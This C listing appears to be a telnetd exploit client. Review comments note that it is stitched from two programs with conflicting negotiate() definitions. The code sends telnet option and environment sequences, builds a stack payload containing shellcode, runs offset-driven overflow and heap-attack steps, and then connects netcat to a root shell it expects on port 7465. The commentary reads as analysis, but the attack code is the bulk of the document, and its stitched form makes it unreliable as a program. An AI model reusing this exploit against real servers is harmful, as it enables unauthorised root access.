/*
 * Telnet option negotiation prelude for socket `sd`: refuses the options a
 * server may ask the client to provide (TTYPE, NAWS, XDISPLOC, OLD-ENVIRON),
 * offers LFLOW, LINEMODE, NEW-ENVIRON and BINARY, and finally pushes a
 * TTYPROMPT environment variable via env().  wont(), will() and env() are
 * defined elsewhere in the file; each one writes to the socket, so the table
 * order below is the on-the-wire order.
 *
 * NOTE(review): a second `negotiate(int)` definition appears further down in
 * this file; the two cannot be compiled into one translation unit, so this
 * listing looks like two separate programs concatenated.
 */
void negotiate(int sd) {
    /* refuse != 0 -> send WONT for the option, otherwise send WILL */
    static const struct {
        int refuse;
        int opt;
    } steps[] = {
        { 1, TELOPT_TTYPE },
        { 1, TELOPT_NAWS },
        { 1, TELOPT_XDISPLOC },
        { 0, TELOPT_LFLOW },
        { 0, TELOPT_LINEMODE },
        { 1, TELOPT_OLD_ENVIRON },
        { 0, TELOPT_NEW_ENVIRON },
        { 0, TELOPT_BINARY },
    };

    for (unsigned i = 0; i < sizeof steps / sizeof steps[0]; i++) {
        if (steps[i].refuse) {
            wont(sd, steps[i].opt);
        } else {
            will(sd, steps[i].opt);
        }
    }

    /* environment variable sent after the option exchange */
    env(sd, "TTYPROMPT", "abcdef");
}
/*
 * Second (conflicting) `negotiate(int)` definition.  Sends packet_1, then
 * assembles one payload in a fixed 1024-byte stack buffer from four pieces --
 * packet_2, a 64-byte 'A' filler, sc, and packet_2_1 -- sends it, and toggles
 * the ECHO option with fixed delays between the steps.  packet_1, packet_2,
 * packet_2_1, sc, sendstr() and cmd() are defined elsewhere in the file.
 *
 * NOTE(review): nothing checks that the four pieces fit in `buf`; the total
 * depends only on the sizes of file-level arrays not visible here, so a change
 * to any of them can overrun the 1024-byte buffer.  `len` is an int that
 * receives a size_t sum.  The filler is 'A' bytes despite the "adding NOP"
 * comment on it.
 */
void negotiate(int sd) {
    char buf[1024];
    char nop[64];
    int len;
    sendstr(sd, packet_1,sizeof(packet_1));
    sleep(2);   /* fixed delay; presumably gives the peer time to consume packet_1 */
    memset(buf,'\0',sizeof(buf));
    memset(nop,'A',sizeof(nop));
    memcpy(buf,packet_2,sizeof(packet_2));
    /* adding NOP */
    memcpy(buf+sizeof(packet_2), nop, sizeof(nop));
    /* shellcode */
    memcpy(buf+sizeof(packet_2)+sizeof(nop), sc, sizeof(sc));
    /* left packet */
    memcpy(buf+sizeof(packet_2)+sizeof(nop)+sizeof(sc),packet_2_1,sizeof(packet_2_1));
    /* total bytes written above; no comparison against sizeof(buf) */
    len = sizeof(packet_2) +sizeof(packet_2_1) + sizeof(nop)+sizeof(sc) ;
    sendstr(sd, buf, len);
    sleep(1);
    /* wont echo */
    wont(sd,TELOPT_ECHO);
    sleep(1);
    /* do echo */
    cmd(sd,TELOPT_ECHO);
    sleep(2);
}
/*
 * Entry point of the telnetd exploit client.  Parses --pause, --size N and
 * --name NAME, derives `offsets` from the chosen size, opens the socket via
 * sock_setup(), walks the telnet option exchange against the server, runs the
 * overflow loop, and finally tries to exec netcat against localhost:7465.
 * mipl, dalen, ninbufoffset, offsets, offset3, oldenv, dasock, tosend, ENV and
 * the helpers (doo, will, wont, doenv, fill, push_clean, push_heap_attack,
 * read_sock, sock_setup) are all defined elsewhere in the file.
 *
 * NOTE(review): pre-C99 style -- no return type on main().  Locals `l`,
 * `percent`, `spin` and `w` are declared but never used; `argc` is unused too.
 */
main (int argc, char *argv[]) {
    int br, l, dosleep = 0;
    int percent = 0;
    char spin;
    unsigned char w;
    bzero (oldenv, sizeof (oldenv));
    argv++;
    /* default "name" length; --name only contributes its length, never its text */
    dalen = strlen ("clarity.local");
    while (argv[0]) {
        if (!strcmp (argv[0], "--pause")) dosleep = 1;
        /* atoi(): no error reporting, non-numeric input silently becomes 0 */
        if (!strcmp (argv[0], "--size") && argv[1]) { mipl = atoi (argv[1]); argv++; }
        if (!strcmp (argv[0], "--name") && argv[1]) { dalen = strlen (argv[1]); argv++; }
        argv++;
    }
    fprintf (stderr, " o MiPl of %4d o NameLen of %2d\n", mipl, dalen);
    if(dalen%3==0) {
        /* name length a multiple of 3: use the alternate offset table */
        offsets=offset3;
    } else {
        /* otherwise rescale entry 11 of the default table by the page count of mipl */
        ninbufoffset = mipl % 8192;
        offsets[11] += 32 * (mipl - ninbufoffset) / 8192;
        if (offsets[11] > 255) {
            /* format string has no conversion specifiers: the two extra
             * arguments are ignored and no newline is printed */
            fprintf (stderr, " ! MiPl too big.", mipl, dalen);
            exit (1);
        }
    }
    sock_setup ();
    if (dosleep) {
        /* --pause: shell out with a fixed command line to list in.telnetd
         * processes, then wait 8 s (no user-controlled text reaches the shell) */
        system ("sleep 1;ps aux|grep in.telnetd|grep -v grep");
        sleep (8);
    }
    dalen += strlen ("\r\n[ : yes]\r\n");
    fprintf (stderr, "o Sending IAC WILL NEW-ENVIRONMENT...\n");
    fflush (stderr);
    /* raw telnet option codes: 5 = STATUS, 39 = NEW-ENVIRON, 1 = ECHO,
     * 24 = TTYPE, 32 = TSPEED, 35 = XDISPLOC */
    doo (5);
    will (39);
    fflush (dasock);   /* dasock is a FILE*; flush forces the queued bytes out */
    read_sock ();
    fprintf (stderr, "o Setting up environment vars...\n");
    fflush (stderr);
    will (1);
    push_clean ();
    doenv ("USER", "zen-parse");
    doenv ("TERM", "zen-parse");
    will (39);
    fflush (dasock);
    fprintf (stderr, "o Doing overflows...\n");
    fflush (stderr);
    /* offsets is read as (offset, length) pairs until a (0, 0) pair */
    for (br = 0; (offsets[br] || offsets[br + 1]); br += 2) {
        fill (mipl + ENV + offsets[br], offsets[br + 1]);
        fflush (dasock);
        usleep (100000);
        read_sock ();
    }
    fprintf (stderr, "o Overflows done...\n");
    fflush (stderr);
    push_clean ();
    fprintf (stderr, "o Sending IACs to start login process...\n");
    fflush (stderr);
    wont (24);
    wont (32);
    wont (35);
    fprintf (dasock, "%s", tosend);
    will (1);
    push_heap_attack ();
    sleep (1);
    fprintf (stderr, "o Attempting to lauch netcat to localhost rootshell\n");
    /* NOTE(review): the variadic list ends with a plain 0 rather than
     * (char *)0 / NULL, which is not a valid sentinel where int and pointers
     * differ in size.  execlp() returns only on failure, so everything below
     * runs only when nc could not be started. */
    execlp ("nc", "nc", "-v", "localhost", "7465", 0);
    fprintf (stderr, "o If the exploit worked, there should be an open port on 7465.\n");
    fprintf (stderr, " It is a root shell. You should probably close it.\n");
    fflush (stderr);
    sleep (60);
    exit (0);
}